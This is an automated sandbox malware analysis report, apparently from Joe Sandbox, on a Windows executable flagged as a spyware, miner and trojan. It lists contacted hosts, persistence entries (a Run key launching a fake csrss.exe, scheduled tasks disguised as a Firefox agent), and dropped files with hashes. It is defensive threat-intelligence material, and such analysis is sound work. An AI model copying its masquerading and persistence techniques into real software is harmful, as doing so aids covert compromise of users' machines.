52.101.68.3	markoren-no.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
130.185.80.210	mx1.cleanmx.pt	Portugal	24768	ALMOUROLTECPT	true
62.156.168.56	wild-east.de	Germany	3320	DTAGInternetserviceprovideroperationsDE	true
213.186.33.4	art-paix-di.org	France	16276	OVHFR	true
198.245.49.18	unknown	Canada	16276	OVHFR	false
213.208.126.141	mhcosta.gotadsl.co.uk	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	true
217.26.61.200	ftp.eskimo.ch	Switzerland	29097	HOSTPOINT-ASCH	true
88.99.82.73	mx01.mail-redirect.de	Germany	24940	HETZNER-ASDE	true
104.47.59.138	waukeshawater-com02b.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
15.197.142.173	veselcontractors.com	United States	7430	TANDEMUS	true
91.195.240.135	schussundtor.de	Germany	47846	SEDO-ASDE	true
85.214.145.11	braekling.de	Germany	6724	STRATOSTRATOAGDE	true
91.136.8.194	mx.alice-dsl.net	United Kingdom	9115	INFB-AS9115GB	true
198.252.102.119	wearethebestin2024.com	Canada	20068	HAWKHOSTCA	true
209.85.202.26	aspmx2.googlemail.com	United States	15169	GOOGLEUS	false
176.123.3.222	unknown	Moldova Republic of	200019	ALEXHOSTMD	false
5.59.227.51	unknown	Czech Republic	50923	METRO-SET-ASMetrosetAutonomousSystemRU	false
185.172.128.145	unknown	Russian Federation	50916	NADYMSS-ASRU	false
62.210.211.126	voltage-distribution.com	France	12876	OnlineSASFR	true
91.121.181.6	unknown	France	16276	OVHFR	false
104.21.94.2	resergvearyinitiani.shop	United States	13335	CLOUDFLARENETUS	false
185.230.63.186	touktoukcie.com	Israel	58182	WIX_COMIL	true
188.40.92.90	joaz.de	Germany	24940	HETZNER-ASDE	true
85.119.249.224	a.mx.nildram.net	United Kingdom	35259	APMAPMInternetUKNetworkGB	true
217.70.178.1	spool.mail.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	true
154.59.112.72	unknown	United States	174	COGENT-174US	false
52.101.68.25	cdgcapitalbourse-ma.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
5.42.64.33	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
193.160.32.19	unknown	unknown	54600	PEGTECHINCUS	false
3.33.130.190	blauthlaw.com	United States	8987	AMAZONEXPANSIONGB	true
38.111.198.185	mx3.mtaroutes.com	United States	62550	INOVADATAUS	true
45.66.33.45	unknown	Netherlands	47482	SPECTRENL	false
162.215.240.240	wefttechnologies.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
51.159.190.167	cabinet-orsika.fr	France	12876	OnlineSASFR	true
211.181.24.133	sjyey.com	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
185.220.101.198	unknown	Germany	208294	ASMKNL	false
217.160.0.208	caspiantravel.co.uk	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
3.33.139.32	protonmail.de	United States	8987	AMAZONEXPANSIONGB	true
59.106.13.100	mlbx.matrix.jp	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
185.230.63.107	sportclinic.co.il	Israel	58182	WIX_COMIL	true
198.185.159.145	publichouse.ie	United States	53831	SQUARESPACEUS	true
217.160.0.179	upblue.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
104.47.22.10	architettosangiorgio-ch.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
104.47.24.36	voltagedistribution-com01i.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
46.105.45.21	mxb.ovh.net	France	16276	OVHFR	true
185.172.128.127	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.39.146.199	www.markoren.no	Sweden	43948	GLESYS-ASSE	true
64.233.184.27	alt2.aspmx.l.google.com	United States	15169	GOOGLEUS	false
13.248.243.5	strategicimpact.com.au	United States	16509	AMAZON-02US	true
142.250.31.27	ASPMX.L.GOOGLE.com	United States	15169	GOOGLEUS	false
103.224.182.253	hotmail.fr.au	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
217.160.122.119	netzschnipsel.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
15.197.204.56	att.com.au	United States	7430	TANDEMUS	true
20.75.101.58	att.com.sg	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
72.52.178.23	pltraffic33.com	United States	32244	LIQUIDWEBUS	true
185.177.47.38	mail.touktoukcie.com	France	174	COGENT-174US	true
95.211.136.23	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
86.107.32.28	collevilca.it	Romania	6910	DIALTELECOMRO	true
15.161.71.77	iisalessandrini.edu.it	United States	16509	AMAZON-02US	true
75.2.70.75	eyegage.com	United States	16509	AMAZON-02US	true
193.23.244.244	unknown	Germany	50472	CHAOS-ASDE	false
195.205.30.250	unknown	Poland	5617	TPNETPL	false
103.224.212.34	park-mx.above.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
147.92.88.67	unknown	United States	396097	SAIL-INETUS	false
52.101.73.15	glazingbt-com01i.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
85.13.138.112	popular.de	Germany	34788	NMM-ASD-02742FriedersdorfHauptstrasse68DE	true
175.119.10.231	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
217.72.192.67	mx01.ionos.de	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
172.253.63.27	smtp.google.com	United States	15169	GOOGLEUS	false
138.197.213.185	mx1.forwardemail.net	United States	14061	DIGITALOCEAN-ASNUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1395739
Start date and time:	2024-02-21 00:21:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MCYq2AqNU0.exe renamed because original name is a hash value
Original Sample Name:	514f0b1d15418dcc5785c2f6ca4a0658.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.mine.winEXE@62/110@1005/100
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.85.23.86, 104.117.182.64, 104.117.182.18, 192.229.211.108, 13.95.31.18, 20.3.187.198, 20.190.152.19, 40.126.24.82, 20.190.152.21, 20.190.152.20, 40.126.24.81, 40.126.24.146, 40.126.24.148, 40.126.24.83, 20.189.173.20, 69.164.46.128, 20.189.173.22, 23.196.3.186, 23.196.3.209
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, e190536.b.akamaiedge.net, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, www.corp.att.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target 98EC.exe, PID 6260 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: MCYq2AqNU0.exe

Simulations

Behavior and APIs

Time	Type	Description
00:22:18	API Interceptor	122990x Sleep call for process: explorer.exe modified
00:22:23	Task Scheduler	Run new task: Firefox Default Browser Agent 65CE8A6AEA9FD925 path: C:\Users\user\AppData\Roaming\ccjteug
00:22:30	API Interceptor	1x Sleep call for process: 8BAD.exe modified
00:22:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
00:22:37	API Interceptor	7x Sleep call for process: MSBuild.exe modified
00:22:40	API Interceptor	7x Sleep call for process: 98EC.exe modified
00:22:41	API Interceptor	1x Sleep call for process: 9E0E.exe modified
00:22:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
00:22:49	API Interceptor	21x Sleep call for process: powershell.exe modified
00:22:52	Task Scheduler	Run new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
00:22:52	API Interceptor	6x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
00:23:14	Task Scheduler	Run new task: Firefox Default Browser Agent 79542B585364343D path: C:\Users\user\AppData\Roaming\usjteug
00:23:17	API Interceptor	7055x Sleep call for process: 81F7.exe modified
00:23:28	API Interceptor	9199x Sleep call for process: csrss.exe modified

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAAEBFHJJDAAKFIECGDBKJDGIJ

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKEHIJJ

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Drivers\csrss.exe

Process:	C:\Users\user\AppData\Local\Temp\81F7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1947648
Entropy (8bit):	7.947881684654529
Encrypted:	false
SSDEEP:	49152:2NVoFnW4i20zpdFRmgXBlLkHSCZ3aQx3PSGFivxfQhIrdY4I:/nW4iZ9dFwgXfLkHtZn3tF4xYh99
MD5:	91DAF47EC23BDC6E075F0B4D81F9D6C7
SHA1:	3C4FFCECCF97568EFEFF3939F51A12BBEE63F6AF
SHA-256:	35FA730ADFDD0B15211D9BC04950F44D90DAA9E72BB945D1158906B15FDDE7C7
SHA-512:	C1CA51F839569BFF829E3FD1E21D900833126CD320A7A36C74C149E5DC4A35BA61254DC6860EC51DEBB2B0AC91817639757D08BD34F8D7366EC1C9BA4F5EEC96
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...p.2c.....................$......c"............@..................................s......................................l...<.....................................................................@............................................text............................... ..`.rdata..\|0.......2..................@..@.data....%.......T..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EFOYFBOLXA.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Reputation:	unknown
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EFOYFBOLXA.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Reputation:	unknown
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\FBGIDHCAAKEBAKFIIIEB

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCBAEHCAEGDHJKFHJKFIJKJEGH

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHIDBKFCAAEBFIDHDBAE

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIEBGIIJDGHCBGCBFIEGDHDHCF

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIGIYTFFYT.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Reputation:	unknown
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\ProgramData\GLTYDMDUST.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Reputation:	unknown
